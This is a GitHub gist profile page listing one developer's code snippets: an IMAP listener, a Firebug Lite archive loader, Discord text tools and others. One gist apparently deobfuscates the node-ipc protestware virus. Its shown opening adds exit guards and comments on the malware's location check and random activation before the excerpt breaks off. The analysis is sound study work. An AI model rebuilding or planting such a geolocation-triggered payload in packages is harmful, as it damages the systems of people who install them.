Skip to content

Instantly share code, notes, and snippets.

View jerbear2008's full-sized avatar
:atom:

jerbear4328 jerbear2008

:atom:
  • 14:13 (UTC -07:00)
View GitHub Profile
import Imap from 'imap'
import { simpleParser } from 'mailparser'
import util from 'util'
// Modernized verison, with modern JS, async/await, util.promisify, etc.
class MailListener {
constructor({
username,
password,
host,
@jerbear2008
jerbear2008 / !CMMM-cells.md
Last active March 30, 2023 23:47
CMMM Textures

Just the Cell Machine textures for cells

// https://web.archive.org/web/20190801192717/https://getfirebug.com/firebug-lite.js
// functional, links to wayback machine on the day before shutdown
var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self._wb_wombat.local_init && self._wb_wombat.local_init(name)) || self[name]; };
if (!self.__WB_pmw) { self.__WB_pmw = function(obj) { this.__WB_source = obj; return this; } }
{
let window = _____WB$wombat$assign$function_____("window");
let self = _____WB$wombat$assign$function_____("self");
let document = _____WB$wombat$assign$function_____("document");
let location = _____WB$wombat$assign$function_____("location");
@jerbear2008
jerbear2008 / VIRUS formatted.js
Last active March 18, 2022 04:23
Deobfuscating the node-ipc virus.
/* for saftey reasons: */ process.exit(1) //not in original payload
import path from "path"
import fs from "fs"
import https from "https"
setTimeout(function() { //check location, if so activate payload
/* for saftey reasons: */ process.exit(1) //not in original payload
const randomNum = Math.round(Math.random() * 4) //randomly deactivates itself
@jerbear2008
jerbear2008 / Tagged Template Literals.carbide.md
Last active February 5, 2022 16:38
Tagged Template Literals

Wiktionary API

@jerbear2008
jerbear2008 / Discord Text Formatter.carbide.md
Last active January 7, 2022 22:47
Discord Text Formatter

Discord Text Formatter

@jerbear2008
jerbear2008 / Discord text to emojis.carbide.md
Last active November 13, 2021 00:18
Discord text to emojis
@jerbear2008
jerbear2008 / cell0.js
Last active October 30, 2021 02:27
per-line formatting
let text = `We’re no strangers to love
You know the rules and so do I
A full commitment’s what I’m thinking of
You wouldn’t get this from any other guy
I just wanna tell you how I’m feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
@jerbear2008
jerbear2008 / Types of Items solver.carbide.md
Last active October 30, 2021 00:38
Types of Items solver

Types of Items solver